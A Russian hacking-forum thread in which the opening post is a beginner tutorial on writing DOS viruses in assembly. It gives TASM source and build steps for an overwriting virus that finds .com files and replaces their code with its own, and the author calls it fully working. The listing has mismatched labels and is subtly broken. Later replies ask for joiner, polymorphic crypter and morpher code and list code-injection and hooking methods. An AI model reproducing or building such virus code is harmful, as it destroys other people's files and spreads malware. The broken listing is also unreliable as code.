Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Кодинг / Низкоуровневое программирование / Assembler
 
  Страница 1
  , 16:21   #1
Постоянный
 
Аватар для noizZzefan
 
Регистрация: 01.03.2012
Сообщений: 651

Репутация: 41 / 1
По умолчанию Вирусы на Ассемблере

Итак,я начинаю цикл статей о вирусах на Ассемблере.
Информация в первую очередь для новичков.
Сильно не пинать!
*И Прошу строго не судить ,это мой первый цикл статей,тем более на Асме.
Ну,первое что охото сказать,это про то,что вам необходимо знать основы программирования на Ассемблере.
Я тоже,учу Ассемблер лишь из за вирусов,ну и наверное начнём!
АССЕМБЛИРОВАТЬ БУДЕМ ЧЕРЕЗ TASM!Он мне родной
Ну,теперь точно начнём ;)
Писать мы будем вирусы,которые заражают *.com файлы.
Они (вирусы) бывают нескольких видов :
1.Переписывающие
2.Компаньонские
3.паразитические.
Комментарии для начала я буду показывать часто(mov ah,9 ;пример коммента)
Итак,для начала создадим файл FLY.ASM и откроем его в блокноте:
Assembler highlight
.model tiny
.code
ORG 100H
FLY:

mov ah,9 ;приготовимся к показу сообщения
mov dx,OFFSET MSG ;его адрес
int 21h ;показываем его через DOS

mov ax,4C00H
int 21h *;здесь мы используем выход через прерывание 21h

MSG DB 'Я муха!$'

END FLY

Вот теперь ассемблируем её.
Как ассемблировать:
Tasm и его программы должны быть в папке с мухой
Например Муха у вас на диске C:\:
Вводим через CMD:
C:\>tasm FLY.asm
Дальше там же вводим:
C:\>tlink /t FLY.obj

И пред вами программа,которая выводит сообщение и закрывается,и она в формате .com!
Надеюсь вы поняли для чего она нам.Мы будем её заражать!
ВНИМАНИЕ!это противоречит одной из заповедей вирусмейкерства,но для обучения это нужно!
Я вас предупреждаю!эти программы/вирусы полностью рабочие,и если что то не получается,достаточно проверить код ещё раз
Засуньте этот файл,в нашу папку-полигон.


Теперь первый наш вирус.он будет искать файл по заданным значениям,потом будет заменять его код своим.Конечно,он ничего больше не умеет,но это ведь только первый вирус.Назовём его TOAD.ASM(Жаба)
Тут комментариев будет мало.
Assembler highlight
code segment
* *assume cs:code,ds:code
* *org 100h
toad proc near

fisrt fly:

*mov ah,4eh

find_file:
xor cx,cx * * ;тут начинается поиск файла
lea dx,comsig
int 21h
jc wart_growth

open_file:
mov ax,3d02h ; тут начинается открытие файла
mov dx,9eh
int 21h

eat_file:
xchg bx,ax ;тут заменяем код программы на код вируса
mov ah,40h
mov cx,offset horny - offset first_fly
lea dx,first_fly*
int 21h

stitch_up:
mov ah,3eh
int 21h
mov ah,4fh
jmp find_fly

wart_growth:
mov ah,09h
mov dx,offset wart
int 21h

cya: int 20h

comsig db "*.com",0 ;свойства файла который ищем
wart db 'Поздравления!вы заразили все .com файлы!$'
horny label near
toad endp
code ends
end first_fly
Готово!можно было выложить комментарии к каждой команде,но я берегу ваше времятеперь Ассемблирование:
Вводим через CMD:
C:\>tasm TOAD.asm
Дальше там же вводим:
C:\>tlink /t TOAD.obj

Ну теперь понятно,кидаем вирус в папку к мухе,ну и понятно

Вот наша статья подошла к концу.
Всем спасибо
И я прошу у вас одно,скажите,продолжать мне писать статьи по этой теме?
__________________
Ъ!
Пользователь вне форума    
Наши Спонсоры
  , 16:38   #2
1nt
Постоянный
 
Аватар для 1nt
 
Регистрация: 19.11.2010
Сообщений: 731

Репутация: 141 / 2
По умолчанию

материал статьи устарел на over 15 лет. ТС, вот ты сам досом часто пользуешься? Типы вирусов вообще вызвали эпилепсию. А слова "резидентный", "нерезидентный" говорят о чем-нибудь?
Продолжать следует только при условии предоставления актуального на сегодняшний день материала с учетом общепринятых формулировок.
__________________
[B][COLOR="Red"][URL="https://hpc.name/showthread.php?t=26401#post284052"]Кейлогер актуален[/URL][/COLOR][/B]
Пользователь вне форума    
  , 16:42   #3
Постоянный
 
Аватар для noizZzefan
 
Регистрация: 01.03.2012
Сообщений: 651

Репутация: 41 / 1
По умолчанию

Ну я знаю,погрузился во времена dos ,если уж подгоняете,можно сразу начать актуальные,начать?
__________________
Ъ!
Пользователь вне форума    
  , 17:41   #4
Banned
 
Регистрация: 04.09.2011
Сообщений: 392

Репутация: 3 / 0
По умолчанию

Начинай, тебе же сказали. Лучше бы написал пример качественного джойнера с подробными комментариями, к примеру. Для обычных вирусов много мозгов не надо, хватает и обычно-вызубренного Win api. Хоть по msdnу и пиши.

Ну а если говорить за себя, то я бы с удовольствием посмотрел код нормального поли-криптора. Сейчас как раз таки в это и въезжаю
 
Пользователь вне форума    
  , 20:59   #5
Новичок
 
Регистрация: 07.02.2011
Сообщений: 27

Репутация: 0 / 0
По умолчанию

Цитата:
Сообщение от SSBug Посмотреть сообщение
Начинай, тебе же сказали. Лучше бы написал пример качественного джойнера с подробными комментариями, к примеру. Для обычных вирусов много мозгов не надо, хватает и обычно-вызубренного Win api. Хоть по msdnу и пиши.

Ну а если говорить за себя, то я бы с удовольствием посмотрел код нормального поли-криптора. Сейчас как раз таки в это и въезжаю
А что такое качественный джойнер? Есть статьи про джойнеры, основы даны. Качество наращивай своими силами, это не так сложно.
__________________
Пишу софт на заказ (C, Asm, C#, Python)
https://hpc.name/showthread.php?p=437161
Пользователь вне форума    
  , 21:17   #6
Постоянный
 
Аватар для noizZzefan
 
Регистрация: 01.03.2012
Сообщений: 651

Репутация: 41 / 1
По умолчанию

Ну раз уже никому не интересно,Простите за флуд,модератор пожалуйста удилите тему!
__________________
Ъ!
Пользователь вне форума    
  , 23:40   #7
Новичок
 
Регистрация: 07.02.2011
Сообщений: 27

Репутация: 0 / 0
По умолчанию

Цитата:
Сообщение от noizZzefan Посмотреть сообщение
Ну раз уже никому не интересно,Простите за флуд,модератор пожалуйста удилите тему!
А кому интересно читать инфу, которая была актуальна 20 лет назад? Тебе уже сказали: "Продолжать следует только при условии предоставления актуального на сегодняшний день материала с учетом общепринятых формулировок."
__________________
Пишу софт на заказ (C, Asm, C#, Python)
https://hpc.name/showthread.php?p=437161
Пользователь вне форума    
  , 01:27   #8
Banned
 
Регистрация: 04.09.2011
Сообщений: 392

Репутация: 3 / 0
По умолчанию

becensed

Цитата:
А что такое качественный джойнер? Есть статьи про джойнеры, основы даны. Качество наращивай своими силами, это не так сложно.
Видимо не один ТС невнимателен ;) Так же мной было сказано:


"Начинай, тебе же сказали. Лучше бы написал пример качественного джойнера с подробными комментариями, к примеру. Для обычных вирусов много мозгов не надо, хватает и обычно-вызубренного Win api. Хоть по msdnу и пиши.

Ну а если говорить за себя, то я бы с удовольствием посмотрел код нормального поли-криптора. Сейчас как раз таки в это и въезжаю"

Теперь хоть ясно?) Ну а нормальный- это значит не тот, в котором только взял и дописал хвост, а тот, в котором помимо есть какие-либо доп.опции, примочки. На это бы взглянул сам.
К стати - добро пожаловать)
 

Последний раз редактировалось SSBug; 28.07.2012 в 01:44.
Пользователь вне форума    
  , 08:24   #9
Постоянный
 
Аватар для noizZzefan
 
Регистрация: 01.03.2012
Сообщений: 651

Репутация: 41 / 1
По умолчанию

Ну я понял,инфа не актуальна ,я сам учился с досовских вирусов,поэтому нет смысла продолжать , и вспоминать Ассемблер(
__________________
Ъ!
Пользователь вне форума    
  , 10:44   #10
Banned
 
Регистрация: 04.09.2011
Сообщений: 392

Репутация: 3 / 0
По умолчанию

Пиши что-нибудь интересное и выкладывай. Не знаю за Всех, а сам я интересуюсь криптографией. Можешь написать свой пример программы - морфера. Да и вообще, уверен что тебе многие будут благодарны если ты станешь выкладывать свои сорсы сложнее хэлловорд'а.


Ну я понял,инфа не актуальна ,я сам учился с досовских вирусов,поэтому нет смысла продолжать , и вспоминать Ассемблер(

А что, под Win писать что ль не можешь? Не знаю как ты учился тому, что стоило учить лет эдак 18 назад. Впечатление будто бы ты взял, выдрал откуда-то исходник и выдал за свой, а теперь решил уверенно съехать. Без обид. Но зачем так мямлить? начал выкладывать- выкладывай. Я читал вопросы win32 программистов которые столкнулись с dos, а вот обратного - нет. Наоборот у dosника есть преимущество из за более глубокого понимания системы. Для перехода под 32-64 ему достаточно только выучить apiшные ф-ии.
Под обычную винду можно и дауна-зубрилку научить писать. Вот только качество будет последним.

1nt

Все перечисленные типы вреда не являются резидентными. Обычные, файловые. Нормально он описал их
 

Последний раз редактировалось SSBug; 28.07.2012 в 11:03.
Пользователь вне форума    
  , 12:14   #11
1nt
Постоянный
 
Аватар для 1nt
 
Регистрация: 19.11.2010
Сообщений: 731

Репутация: 141 / 2
По умолчанию

Цитата:
Сообщение от SSBug Посмотреть сообщение
Под обычную винду можно и дауна-зубрилку научить писать. Вот только качество будет последним.
1nt
Все перечисленные типы вреда не являются резидентными. Обычные, файловые. Нормально он описал их
Для ТС: никто тему удалять не будет, останется в назедание остальным. Начни размещать актуальные материалы и все ок будет. Как минимум можно переводить забугорные статьи.

Не думаю, что дауна-зубрилку можно научить инжектить свой код в адресное пространство файла. А ведь именно этим вирусы и отличаются от остальных вредоносов.
И я больше приемлю типологию википедии.
__________________
[B][COLOR="Red"][URL="https://hpc.name/showthread.php?t=26401#post284052"]Кейлогер актуален[/URL][/COLOR][/B]
Пользователь вне форума    
  , 19:57   #12
Banned
 
Регистрация: 04.09.2011
Сообщений: 392

Репутация: 3 / 0
По умолчанию

Инжект через IT? Достаточно только хорошо знать PE формат. Создание удаленное потока вообще дело тривиальное. Глобальные хуки - тоже достаточно примитивный метод. Про обычный сплайсинг можно и не говорить. Перехват kernel-уровня определенной nt ф-ии- это да, уже покруче. Но все равно ничего в этом архи-сложного нет. Убьешь несколько десятков часов и поймешь это все. Все упирается лишь во время которое ты готов вложить в понимание.
Сложнее всего сложный алгоритм(парадокс)), на подобии того, который есть в хороших мутаторах.
В общем, ТС, пиши мутатор для таких малознаек как я=D Ладно, извиняюсь, больше флудить не буду) Думаю все и так уже поняли что мне нужен пример хорошо-написанного криптора D На этом откланяюсь)

К стати, Вирус так же может быть не резидентным и заражать файлы только при запуске. Там же выделены их подвиды. Резиденты это стелс\руткиты, не резиденты- загрузочные, зловреды в ntfs потоках(дай бог не набрехать) и т.п Ну да ладно, спорить не хочу с int'ом, а то он меня все равно переумничает . Рановато с ним мне тягаться. Кому нужно, тот сам найдет блог грузина(к примеру) и во всем этом разберется)
 

Последний раз редактировалось SSBug; 28.07.2012 в 20:16.
Пользователь вне форума    
  , 21:07   #13
Продвинутый
 
Аватар для BlackH
 
Локация: underworld
Регистрация: 05.12.2011
Сообщений: 1,606

Репутация: 167 / 3
По умолчанию

У меня прям дежавю.ТС ты не где случайно не скопипиздил данный материал?
__________________
Вангую..
Пользователь вне форума    
  , 19:35   #14
Новичок
 
Аватар для elvi
 
Локация: Moscow
Регистрация: 19.01.2013
Сообщений: 15

Репутация: 2 / 0
По умолчанию

Цитата:
Сообщение от BlackH Посмотреть сообщение
У меня прям дежавю.ТС ты не где случайно не скопипиздил данный материал?
"Дежавю - ошибка матрицы."
__________________
[COLOR="Lime"]СВОБОДА![/COLOR] [COLOR="Magenta"]РАВЕНСТВО! [/COLOR][COLOR="Indigo"]УПЯЧКА!11[/COLOR]
Пользователь вне форума    
  , 00:19   #15
Постоянный
 
Аватар для UrEK
 
Локация: Всемирная паутина!
Регистрация: 14.05.2013
Сообщений: 571

Репутация: 55 / 1
По умолчанию

Цитата:
Сообщение от elvi Посмотреть сообщение
"Дежавю - ошибка матрицы."
Археолог, ну зачем поднимать темы 2-летней давности?
 

Последний раз редактировалось ZoRKeG; 14.03.2014 в 00:49. Заявка на редактирование утверждена 14.03.2014 в 13:54.
Пользователь вне форума    

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Вопрос] черьви и вирусы воруют деньги gliderqip Софт для Windows 17 06.05.2011 09:23
Alexfedoruk alexfedoruk Блоги 196 25.04.2011 15:38
С новостью о смерти Фиделя Кастро рассылаются вирусы Ice_pro Архив новостей 0 19.11.2009 18:36



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.